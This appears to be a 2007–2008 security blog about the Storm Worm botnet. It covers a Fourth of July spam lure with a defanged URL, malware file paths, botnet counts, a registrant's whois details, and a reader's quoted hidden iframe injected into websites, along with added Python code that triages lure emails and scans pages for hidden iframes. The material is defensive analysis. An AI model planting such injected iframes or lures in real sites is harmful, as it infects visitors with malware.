Friday, July 04, 2008

Storm - Fourth of July run

Storm Worm (aka CME711/Peed/Peacomm) has recently modified its spam run to play on US Independence Day, July 4th.

The site offers fireworks.exe and tries to force the binary download with malicious JavaScript. Users should be cautioned to watch for pages that look similar to this:

[screenshot of the fireworks.exe lure page]
Instead of the typical "you need to download the codec to play this video" lure, the Storm authors have decided to show some pretty colors on the screen, which may actually trick more users into downloading the malicious file. Hopefully many people in the US will be watching the real fireworks displays and this run will fizzle out.

An example email:

Received: from [133.230.190.105] (helo=ngr)
by izqfx with smtp (Exim 4.62 (FreeBSD))
id 1KEaiJ-0005Pc-6y; Fri, 4 Jul 2008 09:07:55 +0700
Message-ID: <486d8556.6010007@libertytax.com>
Date: Fri, 4 Jul 2008 09:05:10 +0700
From:
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: [redacted]
Subject: Celebrate the spirit of America
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Celebrations have already begun http://68[dot]72[dot]110[dot]46/

(the dots in the URL are replaced with [dot] to prevent accidental clicks)
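As an added example (not code from the original post), here is a small Python triage routine that pulls out the indicators visible in the message above: the originating IP from the Received header, a bare-IP URL in the body, the known lure subject, and the empty From header. Both sample messages are constructed, the first re-assembled from the headers quoted above with the recipient substituted; the two-finding threshold and the lure-subject list are this example's own choices.

```python
import re
from email import message_from_string
from email.message import Message

# Constructed sample, re-assembled from the headers and body quoted above
# (recipient substituted, [dot] defanging kept exactly as in the post).
STORM_LURE = """\
Received: from [133.230.190.105] (helo=ngr)
    by izqfx with smtp (Exim 4.62 (FreeBSD))
    id 1KEaiJ-0005Pc-6y; Fri, 4 Jul 2008 09:07:55 +0700
Message-ID: <486d8556.6010007@libertytax.com>
Date: Fri, 4 Jul 2008 09:05:10 +0700
From:
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: victim@example.invalid
Subject: Celebrate the spirit of America
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Celebrations have already begun http://68[dot]72[dot]110[dot]46/
"""

# Constructed benign message, for contrast.
BENIGN_MAIL = """\
Received: from mail.example.invalid ([192.0.2.10])
    by mx.example.invalid with esmtp id 1ABCDE-000001-AB; Fri, 4 Jul 2008 10:00:00 +0000
From: Alice <alice@example.invalid>
To: bob@example.invalid
Subject: Picnic on Saturday
Content-Type: text/plain; charset=ISO-8859-1

Details here: http://www.example.invalid/picnic
"""

# A URL whose host is a literal IPv4 address (Storm lures point at drones, not domains).
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?(?:/[^\s<>\"']*)?", re.I)
# "from [1.2.3.4]" or "from host ([1.2.3.4])" inside a Received header.
RECEIVED_FROM_RE = re.compile(r"from\s+(?:[^\s\[\]()]+\s+)?\(?\[(\d{1,3}(?:\.\d{1,3}){3})\]", re.I)
# Lure subject quoted in the post; extend as new runs are observed (assumed list).
KNOWN_LURE_SUBJECTS = {"celebrate the spirit of america"}


def refang(text: str) -> str:
    """Undo the [dot] defanging used in the post so pasted samples parse as real URLs."""
    return text.replace("[dot]", ".").replace("[.]", ".")


def body_text(msg: Message) -> str:
    """Return the decoded text/plain body (first text part only, for this example)."""
    if msg.is_multipart():
        for part in msg.walk():
            if part.get_content_type() == "text/plain":
                raw = part.get_payload(decode=True) or b""
                return raw.decode(part.get_content_charset() or "latin-1", "replace")
        return ""
    raw = msg.get_payload(decode=True) or b""
    return raw.decode(msg.get_content_charset() or "latin-1", "replace")


def triage(raw: str) -> dict:
    """Score one RFC 822 message against the Storm lure indicators seen in the post."""
    msg = message_from_string(refang(raw))
    body = body_text(msg)
    findings = []

    ip_urls = [m.group(0) for m in IP_URL_RE.finditer(body)]
    if ip_urls:
        findings.append("bare-IP URL in body")

    subject = (msg.get("Subject") or "").strip()
    if subject.lower() in KNOWN_LURE_SUBJECTS:
        findings.append("known Storm lure subject")

    if not (msg.get("From") or "").strip():
        findings.append("empty From header")

    # Received headers are prepended on each hop, so the last one listed is
    # the earliest hop and names the host that handed the message in.
    origin_ip = None
    received = msg.get_all("Received") or []
    if received:
        m = RECEIVED_FROM_RE.search(received[-1])
        if m:
            origin_ip = m.group(1)

    return {
        "subject": subject,
        "origin_ip": origin_ip,
        "ip_urls": ip_urls,
        "findings": findings,
        "suspicious": len(findings) >= 2,  # assumed threshold for this example
    }


if __name__ == "__main__":
    for name, sample in (("storm lure", STORM_LURE), ("benign", BENIGN_MAIL)):
        print(name, triage(sample))
```

The origin IP and the bare-IP URL are the two values worth feeding into blocklists: the former is the sending drone, the latter the drone currently serving fireworks.exe, and both rotate quickly in a fast-flux botnet, so collect them per message rather than hard-coding them.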

Fireworks.exe drops its peer list to C:\WINDOWS\msserv.config and copies its binary to C:\WINDOWS\msserv.exe. It also points the Windows Time service (W32Time) at time.windows.com and time.nist.gov. Because time.windows.com is the Windows default, those values only mean something on a host that was configured to use a different time server; if yours was, and you suspect an infection, check the NtpServer value under HKLM\SYSTEM\CurrentControlSet\Services\W32Time\Parameters.

Additional information can be found at http://garwarner.blogspot.com/2008/07/storm-worm-salutes-our-nation-on-4th.html


Saturday, August 11, 2007

Behold, the power of Storm

As expected, the Storm botnet has been gaining strength over the last 6 weeks. Current estimates range from hundreds of thousands to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique Storm-related binaries,
3118 unique Storm-serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast-flux domains.

In total, we've identified 3420 unique IP addresses under the control of the Storm Worm author(s) that have identified themselves in one form or another (serving binaries, acting as supernode peers, or hosting nameservers). There are likely hundreds of thousands more drones that we are totally unaware of!

One of the Storm Worm fast-flux domains appears not to be privacy protected. I'm unclear if this is a slip-up or a setup, but it's interesting!
Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327


Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change):

The following code was injected into 4 of my websites:
------------------------------------
<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the virus or Trojan horse. When
I checked the Whois, all were PrivacyProtected, except one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I searched on "Daniel Korwel" in Google I found this news article.

That tells me that the hack of my websites is part of this Storm botnet.
So I assume they have expanded from email to infiltrating websites to spread the worm.
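The reader above found a 1x1 iframe injected into their pages. As an added example (not code from the post or from the reader), here is a small Python scanner a site owner could run over saved copies of their pages to flag iframes that are sized or styled to be invisible. The sample HTML is constructed around the tag quoted in the comment, with the domain left defanged as the reader wrote it; the size threshold and the CSS checks are this example's own heuristics.

```python
from html.parser import HTMLParser


def _tiny(value) -> bool:
    """True for width/height attributes of 0 or 1 pixel ("1", "1px", "0")."""
    if value is None:
        return False
    digits = "".join(ch for ch in value if ch.isdigit())
    return digits != "" and int(digits) <= 1


class HiddenIframeScanner(HTMLParser):
    """Collect <iframe> start tags that a visitor would never see."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: list[dict] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        # The injected tag in the comment: height="1" width="1".
        if _tiny(a.get("width")) and _tiny(a.get("height")):
            reasons.append("1x1-or-smaller frame")
        # Same trick done with inline CSS instead of dimensions.
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        if reasons:
            self.hits.append({
                "src": a.get("src", ""),
                "line": self.getpos()[0],  # 1-based line of the tag in the page
                "reasons": reasons,
            })


def find_hidden_iframes(html: str) -> list[dict]:
    """Return one record per hidden iframe found in the page source."""
    scanner = HiddenIframeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.hits


# Constructed sample page: the reader's injected tag (domain kept defanged),
# a CSS-hidden variant, and a legitimate full-size embed that must not match.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://kqfloat.xxxcom/ind.php" alt="BYDLOSHKA" height="1" width="1"></iframe>
<p>Some content</p>
<iframe src="http://evil.example/x.php" style="display: none"></iframe>
<iframe src="http://video.example/embed/123" width="640" height="360"></iframe>
</body></html>"""


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(f"line {hit['line']}: {hit['src']} ({', '.join(hit['reasons'])})")
```

Run it against every HTML and PHP template on the server, not just the public pages, since the injection is usually written into a shared footer or index file and shows up on every page that includes it.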
